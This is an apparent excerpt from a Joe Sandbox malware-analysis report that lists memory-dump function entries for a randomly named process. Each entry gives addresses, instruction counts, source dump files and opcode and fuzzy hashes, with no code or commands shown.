                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e78f68c39b413e48f8e92a8157f2a8c0ee5068d043b57f76874513672324c9a8
                                                    • Instruction ID: 7a3f3ed35ffb4550aeffb96e91fc30b70ca9586e96482215d46232321732252d
                                                    • Opcode Fuzzy Hash: e78f68c39b413e48f8e92a8157f2a8c0ee5068d043b57f76874513672324c9a8
                                                    • Instruction Fuzzy Hash: E851E865A1DB8E9FFF999B3884156B577E1FF56300B4444BED05EC71A3DE28E8048780
                                                    Function 00007FFAAC6508D0 Relevance: .2, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 819537bece8d78ac25ecf67f3ddbff6f10ed0170e295930df3bf42f59e2252a1
                                                    • Instruction ID: ad8aa30040dec2116f5175cf980c9fb826677b20dddf3e88f9a9a39ed04d7717
                                                    • Opcode Fuzzy Hash: 819537bece8d78ac25ecf67f3ddbff6f10ed0170e295930df3bf42f59e2252a1
                                                    • Instruction Fuzzy Hash: CA517E76908A5D8FEB44EFA8D495AEEBBA0FF49314F14457AD04ED7292CF34A841C780
                                                    Function 00007FFAAC685000 Relevance: .2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd072605b47189ceacc6683b9ee0efd52aea9e73b14d90126f6a07f82249e02c
                                                    • Instruction ID: 20ff7d5fd2e928bea22895071ed6de6635b1b72b66943873bb89b54f5482876c
                                                    • Opcode Fuzzy Hash: cd072605b47189ceacc6683b9ee0efd52aea9e73b14d90126f6a07f82249e02c
                                                    • Instruction Fuzzy Hash: EF51D17188E3C54FE7138B305C621E53FB49F13215B1E91EBD488CA4E3D61E569AC3A2
                                                    Function 00007FFAACDAFDB9 Relevance: .2, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61a669b6149dacec3bcb7d5e393858febc8b32d7c71d4e21e942777026de27d6
                                                    • Instruction ID: 4ab923e849361290e73dbe3dd75f676cebbfffc8dc1e28eb21a195bbf683074a
                                                    • Opcode Fuzzy Hash: 61a669b6149dacec3bcb7d5e393858febc8b32d7c71d4e21e942777026de27d6
                                                    • Instruction Fuzzy Hash: 72519470A1991D8FDF99EB18C894BE877B1FB69301F5041E9D00EE7691DA31AE85CF40
                                                    Function 00007FFAAC650960 Relevance: .1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2dd2447f6d349089e7d42d4ce41b340faf9111ea1117dff406cd07ae2384411
                                                    • Instruction ID: bf3541f98c3696cf94e623242dc5a023739179b36b738e29f8d92d1aa83ac204
                                                    • Opcode Fuzzy Hash: f2dd2447f6d349089e7d42d4ce41b340faf9111ea1117dff406cd07ae2384411
                                                    • Instruction Fuzzy Hash: 35416E75918A1D9FEB84EFA8D495AEDB7E1FF58311F10417AE40ED3292CF34A8418B80
                                                    Function 00007FFAACDB128E Relevance: .1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5353ca27da670a0163ef269fad2ec8f68e17442ff85a5ab27d11f9eb0bc0f1c3
                                                    • Instruction ID: e9606c64fb6b195fc0edfa24b056e7c1bcae3a361f6d52df39f7beb8fcf3b65e
                                                    • Opcode Fuzzy Hash: 5353ca27da670a0163ef269fad2ec8f68e17442ff85a5ab27d11f9eb0bc0f1c3
                                                    • Instruction Fuzzy Hash: 9F4191B1E0CA5DCFEB98DB9884557ACBBF1FF59300F44416DD01ED7692CA74A8888B81
                                                    Function 00007FFAACDA358C Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30b5b0188a2cf644f7ebd8cde1c79c5ae8ed86615c0d52cd7b0f5a7dbc576a9d
                                                    • Instruction ID: 70e36684ae044334bbbe64ab8eb26d8b261dd9c674894032237df9e57da20b7b
                                                    • Opcode Fuzzy Hash: 30b5b0188a2cf644f7ebd8cde1c79c5ae8ed86615c0d52cd7b0f5a7dbc576a9d
                                                    • Instruction Fuzzy Hash: 8F518470A4991D8FDB98EF18C898FA8B7B1FB69704F5041E9D10EE7261CA31AD85CF44
                                                    Function 00007FFAACDA35A5 Relevance: .1, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87780c126af16fffbdc15a1e3dbf8743263d07df8a5de6065f3cf57f68ef155b
                                                    • Instruction ID: 234ed18caea541a4419aafa2a20371b7db28fcf811460c50d4ccbb4c3f58f2e9
                                                    • Opcode Fuzzy Hash: 87780c126af16fffbdc15a1e3dbf8743263d07df8a5de6065f3cf57f68ef155b
                                                    • Instruction Fuzzy Hash: B4419574A5491D8FDB98EF18D899FA8B7B1FB68304F5041E9D10EE7261CA319E82CF44
                                                    Function 00007FFAACDA2FB7 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08041d54a43a29d1184d70157f1bcfe9c60b18bb2b8b35165ce5c3286d0ca5cd
                                                    • Instruction ID: a632ac835a5a3896c3fe4b153306ca37828f8aefcaf61e83046c5949f47e1d6e
                                                    • Opcode Fuzzy Hash: 08041d54a43a29d1184d70157f1bcfe9c60b18bb2b8b35165ce5c3286d0ca5cd
                                                    • Instruction Fuzzy Hash: 5D414F3260CA588FDF99EF28C495DA4B7E1FFA9710B0445AAD01EC3692DE24F845CBC5
                                                    Function 00007FFAACDA3061 Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37ecdc72a4fd46615866c1ee7dc0a6fcb7048b4665dd9a812313090c0086544a
                                                    • Instruction ID: bdb0399d873435667b9f8dcdd28e7955de7afbf28cb8148fa88ad29c92048513
                                                    • Opcode Fuzzy Hash: 37ecdc72a4fd46615866c1ee7dc0a6fcb7048b4665dd9a812313090c0086544a
                                                    • Instruction Fuzzy Hash: 77318D71A08E588FDB99EF28C095E64B7E1FFA931070446AAD05EC7692CE24F845CBC1
                                                    Function 00007FFAACDA2FFB Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c509333fe78de01d0380547465c9d52ac6e6e91d0413c04ad7884597bcfd15ee
                                                    • Instruction ID: dc404e68c808676e1882b6876af1841f40c1f1dcc59fc4de6b813ea21984565b
                                                    • Opcode Fuzzy Hash: c509333fe78de01d0380547465c9d52ac6e6e91d0413c04ad7884597bcfd15ee
                                                    • Instruction Fuzzy Hash: 82316B71608E588FDB98EF28C095EA4B7E1FFA971070446A9D01EC7692DE24F845CBC1
                                                    Function 00007FFAAC650998 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1304d605cbfbf6c6e27aca2ad55b55734ac47fd714c62f3574c146f7482be53
                                                    • Instruction ID: 3a0c17b1e116fbec9761812ddae756ebb5bed5b58b627145cbb345c53e273a75
                                                    • Opcode Fuzzy Hash: c1304d605cbfbf6c6e27aca2ad55b55734ac47fd714c62f3574c146f7482be53
                                                    • Instruction Fuzzy Hash: 3041E77091495D8FEB88EFA8C495AEDBBF1FF58301F10517AE40EE3295DB34A8458B90
                                                    Function 00007FFAAC685090 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e001654af6a406ec6ad9da89742a24a4a035e2c018dde51f12b4b81894d2e9a1
                                                    • Instruction ID: f0a348b9aeec792b3d541852666780d4dc02c70a1f6c607da930162c17d7801c
                                                    • Opcode Fuzzy Hash: e001654af6a406ec6ad9da89742a24a4a035e2c018dde51f12b4b81894d2e9a1
                                                    • Instruction Fuzzy Hash: 4E31C37188E2859FE7178B305C535F63FA49F03311B1951E7E048CB4A2C62DA39AC3E2
                                                    Function 00007FFAAC653310 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6e2f8f90708e10fc4d9986dce50c8382d7406fb62edeeef39101dbb76e94747
                                                    • Instruction ID: 618e7b040321ffd95268b59cd9a31a2923ca213dc1175df1ea4948a226eb8c28
                                                    • Opcode Fuzzy Hash: c6e2f8f90708e10fc4d9986dce50c8382d7406fb62edeeef39101dbb76e94747
                                                    • Instruction Fuzzy Hash: 6941E730D19A1DCEEBA5DB18C8546F976B1EF5A351F6061BDC10DE2291DF34AA888F80
                                                    Function 00007FFAACDA2DC5 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a682a2a96ec7c2b0ccdd2f7d21b9a4088e470144be974ec263dbc2a866b64173
                                                    • Instruction ID: bb3fa3d951963a06824e8bbb6ebfdc33620aad71bc6e0d4e1ed33e3a05528653
                                                    • Opcode Fuzzy Hash: a682a2a96ec7c2b0ccdd2f7d21b9a4088e470144be974ec263dbc2a866b64173
                                                    • Instruction Fuzzy Hash: 7A317A31A1E94ACFFB98DB5584815BDB7B1FF46700F50807AD02EC2581CB38EA888BC1
                                                    Function 00007FFAACDA1CB0 Relevance: .1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0712a5769fe9b99b685db061f53c4322f4a54ece94125cb485df5b67a946971
                                                    • Instruction ID: 1c84eeb8f1f863f5fec5a765a1b77e30f8da2f4777386b48be75465a89cd3a2f
                                                    • Opcode Fuzzy Hash: a0712a5769fe9b99b685db061f53c4322f4a54ece94125cb485df5b67a946971
                                                    • Instruction Fuzzy Hash: AD31F910A1D696CAFF1A831884606747F61EF53711B588ABED0AFCB8D7C85CE84A93C1
                                                    Function 00007FFAAC6580F6 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c076d667b45aa7827050b221367a1e4587a101e945fa33cacaef78b9cc2568d
                                                    • Instruction ID: bfb4bade5a6d9f65167644f31aced46b5b941e4cc1f6916c731a938d58344413
                                                    • Opcode Fuzzy Hash: 8c076d667b45aa7827050b221367a1e4587a101e945fa33cacaef78b9cc2568d
                                                    • Instruction Fuzzy Hash: 6631C871D0852C8FDFA5EB14C854AE9B3F1FB68301F1091EA904EE2664CE75AAC58F81
                                                    Function 00007FFAAC68AFCD Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8f31d15d8d060942d48822ae54c5da979b3162422b37d13c45bc7bb274a92c8
                                                    • Instruction ID: 3ed6e9d529499138788539c9c80bf358e3b59254f27f870b073c4737fd88abd1
                                                    • Opcode Fuzzy Hash: c8f31d15d8d060942d48822ae54c5da979b3162422b37d13c45bc7bb274a92c8
                                                    • Instruction Fuzzy Hash: 14219C7080964CDFEF55EF68C849AED7BA0EF59300F0451AAE40DD7192DB35EA98CB81
                                                    Function 00007FFAACDB176D Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: acf06c97a77d872db2061bc52aca57b1b269a338d72a60e4260e788ddf1cf8a9
                                                    • Instruction ID: 2767e029b1eb4238957f993291a897d7f6e83095e9851f6fd33998cc7c3b448f
                                                    • Opcode Fuzzy Hash: acf06c97a77d872db2061bc52aca57b1b269a338d72a60e4260e788ddf1cf8a9
                                                    • Instruction Fuzzy Hash: 4C113A62B1DE0D8FF7A8A72C541A2763BC1EFAA611B0142BFE41DC3696ED19EC0543C1
                                                    Function 00007FFAAC6533D3 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 628d916c49fb8ac1e8b9dd2019e8544bb17522e7fcb3be6b5eeca75696549800
                                                    • Instruction ID: 6afcc56484ec460cbce865be6ceafd77c2e3342946f39dc9a4c59498446e5a67
                                                    • Opcode Fuzzy Hash: 628d916c49fb8ac1e8b9dd2019e8544bb17522e7fcb3be6b5eeca75696549800
                                                    • Instruction Fuzzy Hash: 6031F470D19A2CCEEB65EB18C8587E977B1EF59342F5061F9D10DE2291DB34AA84CF40
                                                    Function 00007FFAAC650C25 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c73a60a195adc4d9ffa79e1679fdd564312e949cddc92bcee79b3a09078105b5
                                                    • Instruction ID: efd32bbc70c25140d94ae22ad2d3870c0ab53e0c48ae3e419f2d6984ded4d84a
                                                    • Opcode Fuzzy Hash: c73a60a195adc4d9ffa79e1679fdd564312e949cddc92bcee79b3a09078105b5
                                                    • Instruction Fuzzy Hash: 4421D576A0D69D8FF312DB68DC152E97B60EF83311F04A4BAD148DB1D2DA38A509C7D1
                                                    Function 00007FFAACDB34D0 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90176318596e2ff59d5ef4a9e93ab7d217ca0252c319c297b8b1d1c6e342faed
                                                    • Instruction ID: 6ecff0268de7cdf1d24b4f86b9535e0a773634ab9355e5123485ceccd8940bdc
                                                    • Opcode Fuzzy Hash: 90176318596e2ff59d5ef4a9e93ab7d217ca0252c319c297b8b1d1c6e342faed
                                                    • Instruction Fuzzy Hash: 4811C17084978A9FEB069F3888464E97FF0EF16301F0541EBE45CC7192CA3DA59AC791
                                                    Function 00007FFAAC650C40 Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 351e82363d2cad206b8229839827ba38084de21565f6c79ef3a72f8b14148736
                                                    • Instruction ID: 1e3ab1bd146f04c79bcbb93717c37885eef38e5e47fa4fcbc730f91d06d7b6ef
                                                    • Opcode Fuzzy Hash: 351e82363d2cad206b8229839827ba38084de21565f6c79ef3a72f8b14148736
                                                    • Instruction Fuzzy Hash: 0D110376A0E69D8FF703DB68D8112E97B70EF43320F04A5BAC1489B1D2CA38A50C8781
                                                    Function 00007FFAACDA0D60 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96a1831a1832b81ec2d80a42c5a66bc63e6f27c6f711d6f137aaae1fdfce9fa7
                                                    • Instruction ID: d61a196cea6e69c4b622b9ef2980ed82fa5075ceee5b605e63b7e24454f341c0
                                                    • Opcode Fuzzy Hash: 96a1831a1832b81ec2d80a42c5a66bc63e6f27c6f711d6f137aaae1fdfce9fa7
                                                    • Instruction Fuzzy Hash: 12116D31A0AA1A8FEB55EB28D0119FA73E1FF59311B40867AD44FC7592DF28F40986D0
                                                    Function 00007FFAAC6535A9 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4cef8b0e57140c805c8b46414ca65e0474ba6612224a2ec169236fb2b33822a5
                                                    • Instruction ID: 443c1d281bda0d0946674b160f6f8eca37499203263fb2332eed41d14750a341
                                                    • Opcode Fuzzy Hash: 4cef8b0e57140c805c8b46414ca65e0474ba6612224a2ec169236fb2b33822a5
                                                    • Instruction Fuzzy Hash: E8216370919A2DCEEB65EB14CC947EAB6B1FB55342F1061FAC40DE2291DF74AA84CF40
                                                    Function 00007FFAACDA0BDE Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 38dc9e4373ebc6ecd381cd041de0297abc8eb7fc183648643eb939f205e7b745
                                                    • Instruction ID: 82cfd419ecdef629d394f991b3e8f5135e3b5398058faf136d8ec37468cb04bd
                                                    • Opcode Fuzzy Hash: 38dc9e4373ebc6ecd381cd041de0297abc8eb7fc183648643eb939f205e7b745
                                                    • Instruction Fuzzy Hash: 1B11E53230A5068FFB1A9B18D4616E573A1EF56351F00817AD91EC76D1CB29B454C7D0
                                                    Function 00007FFAAC653629 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction ID: 45b28be598a9bce701c8beffd459ee7c3539584a06120923b6b1d1a4f6bf8619
                                                    • Opcode Fuzzy Hash: 7e5fe71cf4407825764a8aad994a0b754fb7812e8e2c771a49ba34bda38d0c13
                                                    • Instruction Fuzzy Hash: 8E21D670C19A2DCEEB65DB14CC947EAB6B0EF45342F1061F9D50DA2291DF78AA88CF40
                                                    Function 00007FFAAC689DB9 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8597e576884c0ba15afa1d6be2c29453510f6e653a4fbbb03e59c6fa582979b
                                                    • Instruction ID: b6b8b9e6d29dd47f3a9f6224a960a8b95dbcca0ab3cfe9a264b76333888f90ae
                                                    • Opcode Fuzzy Hash: d8597e576884c0ba15afa1d6be2c29453510f6e653a4fbbb03e59c6fa582979b
                                                    • Instruction Fuzzy Hash: AB112E70808A8D8FDF45EF58C859AEA7FF0FF69305F05419AE408D7251D7349954CB81
                                                    Function 00007FFAAC650B87 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e151c2df69f3ec49a9c8c43c6b03191ab9d75abccd7941dd3c2bde409d375c93
                                                    • Instruction ID: fa7944bed7df31154d2284a0afdedc2041bedb20aa6cca9783794f4ff4d52156
                                                    • Opcode Fuzzy Hash: e151c2df69f3ec49a9c8c43c6b03191ab9d75abccd7941dd3c2bde409d375c93
                                                    • Instruction Fuzzy Hash: 6811093156864DCFCB45EF28C881AEABBE0FF59304F0551AAE84DD7251C730E564CB81
                                                    Function 00007FFAAC6852F5 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a218dc09f6879bf901a632e05a7d1753aa6116531c753199c8ba178d969c5e9
                                                    • Instruction ID: 26c48e2d3b79ddd1675f323a18ef3cb16cc09aeb514874915459e5596c602051
                                                    • Opcode Fuzzy Hash: 2a218dc09f6879bf901a632e05a7d1753aa6116531c753199c8ba178d969c5e9
                                                    • Instruction Fuzzy Hash: 41018C7180968DCFFB56EF68C8066E97BA0FF56300F406076E90CC2192DB39AA58C781
